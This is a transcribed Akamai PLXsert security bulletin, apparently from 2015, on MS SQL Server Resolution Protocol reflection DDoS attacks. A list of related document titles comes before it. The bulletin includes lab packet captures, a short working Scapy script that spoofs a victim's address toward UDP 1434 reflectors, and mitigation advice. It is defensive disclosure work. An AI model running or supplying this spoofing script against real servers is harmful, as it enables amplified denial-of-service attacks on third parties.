The server will respond to the client with a list of instances. One such attack was analyzed by an information security researcher in January 2015.



Similar documents
SSDP REFLECTION DDOS ATTACKS

JOOMLA REFLECTION DDOS-FOR-HIRE

DNS FLOODER V1.1. akamai s [state of the internet] / Threat Advisory

NTP-AMP: AMPLIFICATION TACTICS AND ANALYSIS

[state of the internet] / DDoS Reflection Vectors. Threat Advisory: NetBIOS name server, RPC portmap and Sentinel reflection DDoS

Threat Advisory: Trivial File Transfer Protocol (TFTP) Reflection DDoS

[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks

CloudFlare advanced DDoS protection

Web Application Vulnerability Scanner: Skipfish

Secure Content Delivery Network

Acquia Cloud Edge Protect Powered by CloudFlare

Introduction to DDoS Attacks. Chris Beal Chief Security Architect on Twitter

AKAMAI SOLUTION BROCHURE CLOUD SECURITY SOLUTIONS FAST RELIABLE SECURE.

HIMSS Survey Uncovers Critical Weaknesses In Hospital Web Security

DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS

Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst

How to Evaluate DDoS Mitigation Providers:

How To Block A Ddos Attack On A Network With A Firewall

HOW TO PREVENT DDOS ATTACKS IN A SERVICE PROVIDER ENVIRONMENT

AKAMAI WHITE PAPER. The Challenges of Connecting Globally in the Pharmaceutical Industry

Making the Internet Business-Ready

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003

THE INTERNET GETS BETTER WHEN WE WORK TOGETHER

Strategies to Protect Against Distributed Denial of Service (DD

Cloud Security In Your Contingency Plans

How To Stop A Ddos Attack On A Network From Tracing To Source From A Network To A Source Address

DDoS Protection on the Security Gateway

NETWORK SECURITY (W/LAB) Course Syllabus

Account Checkers and Fraud

/ Staminus Communications

akamai s [state of the internet] Q executive review

How To Protect Yourself From A Dos/Ddos Attack

DDoS Threat Report. Chris Beal Chief Security Architect on Twitter

THE AKAMAI SERVICE CONSULTING PACKAGE 10FOR10 IMPROVES YOUR WEB PERFORMANCE METRIC(S) BY AT LEAST 10%! AKAMAI 10For10 AKAMAI INDUSTRY BROCHURE

This document is licensed for use, redistribution, and derivative works, commercial or otherwise, in accordance with the Creative Commons

TDC s perspective on DDoS threats

On-Premises DDoS Mitigation for the Enterprise

Strategies to Protect Against Distributed Denial of Service (DDoS) Attacks

DNS amplification attacks

DDoS ATTACKS: MOTIVES, MECHANISMS AND MITIGATION

Chapter 11 Cloud Application Development

DDoS Mitigation Solutions

Firewall Testing Methodology W H I T E P A P E R

TECHNICAL NOTE 01/2006 ENGRESS AND INGRESS FILTERING

CSE 3482 Introduction to Computer Security. Denial of Service (DoS) Attacks

Application DDoS Mitigation

White Paper. Intelligent DDoS Protection Use cases for applying DDoS Intelligence to improve preparation, detection and mitigation

AKAMAI WHITE PAPER. Delivering Dynamic Web Content in Cloud Computing Applications: HTTP resource download performance modelling

Networking for Caribbean Development

VALIDATING DDoS THREAT PROTECTION

DDoS Overview and Incident Response Guide. July 2014

How To Stop A Malicious Dns Attack On A Domain Name Server (Dns) From Being Spoofed (Dnt) On A Network (Networking) On An Ip Address (Ip Address) On Your Ip Address On A Pc Or Ip Address

Distributed Denial of Service Attack Tools

VIEWABILL. Cloud Security and Operational Architecture. featuring RUBY ON RAILS

How To Protect A Dns Authority Server From A Flood Attack

Stop DDoS Attacks in Minutes

Technical Note. ForeScout CounterACT: Virtual Firewall

CS5008: Internet Computing

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Security Technology White Paper

Best Practices for Running Symantec Endpoint Protection 12.1 on the Microsoft Azure Platform

Firewalls and Intrusion Detection

DDoS Protection. How Cisco IT Protects Against Distributed Denial of Service Attacks. A Cisco on Cisco Case Study: Inside Cisco IT

SHARE THIS WHITEPAPER. On-Premise, Cloud or Hybrid? Approaches to Mitigate DDoS Attacks Whitepaper

Protecting Your Organisation from Targeted Cyber Intrusion

2014 Foley & Lardner LLP Attorney Advertising Prior results do not guarantee a similar outcome Models used are not clients but may be representative

Characterization and Analysis of NTP Amplification Based DDoS Attacks

First Line of Defense

Cisco Advanced Services for Network Security

Technology Blueprint. Defend Against Denial of Service Attacks. Protect each IT service layer against exploitation and abuse

CS 356 Lecture 16 Denial of Service. Spring 2013

UMHLABUYALINGANA MUNICIPALITY FIREWALL MANAGEMENT POLICY

Spike DDoS Toolkit OVERVIEW INDICATORS OF BINARY INFECTION. TLP: GREEN GSI ID: 1078 Risk Factor - High

Security Toolsets for ISP Defense

Network Security of Internet Services: Eliminate DDoS Reflection Amplification Attacks

IPv6 SECURITY. May The Government of the Hong Kong Special Administrative Region

Denial of Service. Tom Chen SMU

Denial of Service Attacks

The Advanced Attack Challenge. Creating a Government Private Threat Intelligence Cloud

First Line of Defense

Global Partner Management Notice

The Continuing Denial of Service Threat Posed by DNS Recursion (v2.0)

WatchGuard Technologies, Inc. 505 Fifth Avenue South Suite 500, Seattle, WA

Secure Content Delivery Network

SHARE THIS WHITEPAPER. Top Selection Criteria for an Anti-DDoS Solution Whitepaper

THREAT VISIBILITY & VULNERABILITY ASSESSMENT

Internet Firewall CSIS Internet Firewall. Spring 2012 CSIS net13 1. Firewalls. Stateless Packet Filtering

Firewall Firewall August, 2003

Availability Digest. Prolexic a DDoS Mitigation Service Provider April 2013

VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT ISSUE 2 2ND QUARTER 2014

O N L I N E I N C I D E N T R E S P O N S E C O M M U N I T Y

Content Distribution Networks (CDN)

Safeguards Against Denial of Service Attacks for IP Phones

Learn Ethical Hacking, Become a Pentester

DDoS Vulnerability Analysis of Bittorrent Protocol

SAFE-T RSACCESS REPLACEMENT FOR MICROSOFT FOREFRONT UNIFIED ACCESS GATEWAY (UAG)

Security F5 SECURITY SOLUTION GUIDE

Transcription:

1 TLP: GREEN 02.11.15 GSI ID: 1086 SECURITY BULLETIN: MS SQL REFLECTION DDOS RISK FACTOR - MEDIUM 1.1 / OVERVIEW / Beginning in October 2014, PLXsert observed the use of a new type of reflection-based distributed denial of service (DDoS) attack. This new method of attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR provides a way for clients to identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on configured MS SQL servers on the network, the SQL Resolution Protocol can be used. The server will respond to the client with a list of instances. One such attack was analyzed by an information security researcher in January 2015. PLXsert confirmed this attack with a publicly available tool. In addition, a weaponized tool that allows automatic execution of the entire attack was found. Attackers abuse Internet-available SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. Depending on the number of instances present in the abused SQL server, the amplification factor varies. This new attack vector has been spotted in several DDoS attack campaigns mitigated by Akamai. 1.2 / MALIC IOUS P AY LOAD / This attack presents a specific payload signature, which is shown in Figure 1. This example produced an amplification factor of nearly 25x. In this case, the attacker s request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration. 19:31:53.778211 IP X.X.X.X.1434 > Z.Z.Z.Z.27960: UDP, length 691...E...{...mG*...m8...ServerName;<redacted>;InstanceName;MSSQLSERVER;IsClust ered;no;version;9.00.5000.00;tcp;1433;np;\\<redacted>\pipe\sql\query;via;<redacted>,0:143 3;;ServerName;<redacted>;InstanceName;SQL2005ADV;IsClustered;No;Version;9.00.2047.00;tcp; 56532;np;\\<redacted>\pipe\MSSQL$SQL2005ADV\sql\query;via;<redacted>,0:1433;;ServerName;< redacted>;instancename;sqlexpress;isclustered;no;version;10.50.2500.0;tcp;52618;np;\\<red acted>\pipe\mssql$sqlexpress\sql\query;via;<redacted>,0:1433;;servername;<redacted>;insta ncename;sql2012;isclustered;no;version;11.0.3000.0;tcp;65469;np;\\<redacted>\pipe\mssql$s QL2012\sql\query;via;<redacted>,0:1433;; Figure 1: A UDP response packet payload sent to a target. Target information has been redacted for privacy. 1 1

2 Figure 2 and Figure 3 show network traffic between the spoofed source and the SQL Server instance. The SQL Server responds to a query with the database instances and their network protocol connection information. The queries in Figure 2 are 1 byte payloads that result in 137 byte response payloads. This achieves both reflection and amplification on the response to the original request. The amplification may be larger if the targeted SQL server has multiple instances, because the server will respond with information on all configured instances. The potential amplification factor drives attackers to seek and probe for clustered SQL server hosts, which are usually present at Internet service providers (ISPs), hosting providers and Software-as-a-Service (SaaS) providers. The figures show the attack traffic and responses to a spoofed source, querying a single SQL Server Express instance. // 192.168.1.101 spoofing request from.108 12:39:07.751261 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1 // reflected reply 12:39:07.853641 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 E...:...{Q...g...m...P..]...ServerName;TARGET1;InstanceName;SQLEXPRESS;IsClustered;No; 12:39:11.744710 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1 12:39:11.847152 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 E...:...{P...g...m...P..]...ServerName;TARGET1;InstanceName;SQLEXPRESS;IsClustered;No; 12:39:32.326767 IP 192.168.1.108.80 > 192.168.1.103.1434: UDP, length 1 12:39:32.455674 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 Figure 2: Traffic capture of the attack reproduced in the lab, as seen by the reflector 2 2

3 12:34:26.107469 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 12:34:29.600969 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 12:34:32.687004 IP 192.168.1.103.1434 > 192.168.1.108.80: UDP, length 137 Figure 3: Traffic capture of the attack reproduced in the lab, as seen by the target 1.3 / ATTACK TOOLS / PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool. The script is shown in Figure 4. #!/usr/bin/python2 from scapy.all import * target = sys.argv[1].split(":") target_ip = target[0] // victim ip target_port = target[1] // victim port reflector_ip = sys.argv[2] // vulnerable reflector query = '03'.decode('hex') // send query (x02 also works) pkt=ip(src=target_ip,dst=reflector_ip)/udp(dport=1434,sport=int(target_port))/query build the packet send(pkt) // Figure 4: PLXsert used a packet manipulation tool to replicate the attack in a lab environment Other tools publicly available on the Internet could reproduce this attack as well. Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use an unicast client request 0x03 or a broadcast request 0x02. Both are requests with a data length of 1 byte that will produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse. Figure 5 shows a screenshot of the github page for the project named mssqldos. 3 3

4 Figure 5: The GitHub page f or the mssqldos tool The mssqldos tool automates the spoofing of sources and the query of targeted servers for abuse. The responses will be reflected back to the intended target. The tool simplifies the attack and increases the speed by offering simple list processing of vulnerable reflectors and multi-threaded packet flooding. 1.4 / RECOMMENDED MITIGATION / Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers with exposed SQL Server Resolution Protocol ports to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive and affected organizations should refine and adapt them further based on specific infrastructure and exposed services. Microsoft Technet: Security Best Practices to Protect Internet Facing Web Servers. The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to only allow trusted IP addresses. 4 4

5 Block inbound connections from the Internet, if ports are not needed for external access or administration. SQL Server Resolution Protocol service is not needed in servers that have only one database instance. This has been disabled by default since Microsoft SQL Server 2008. It is not disabled in earlier or desktop engine versions. Disable this service to prevent the abuse of SQL server for this type of attack. If the use of SQL Server Resolution Protocol service is needed, add an additional layer of security before the service is accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above. 1.5 / DDOS MITI GATI ON / PLXsert recommends the use of upstream filtering to mitigate the UDP traffic generated by this DDoS attack to protect the servers being targeted with the reflected, amplified traffic. The Prolexic Security Engineering and Research Team (PLXsert) monitors malicious cyber threats globally and analyzes these attacks using proprietary techniques and equipment. Through research, digital forensics and post-event analysis, PLXsert is able to build a global view of security threats, vulnerabilities and trends, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, along with best practices to identify and mitigate security threats and vulnerabilities, PLXsert helps organizations make more informed, proactive decisions. Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company s solutions is the Akamai Intelligent Platform providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter. Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on www.akamai.com/locations 2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its publication date; such information is subject to change without notice. Published 02/15. 5

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information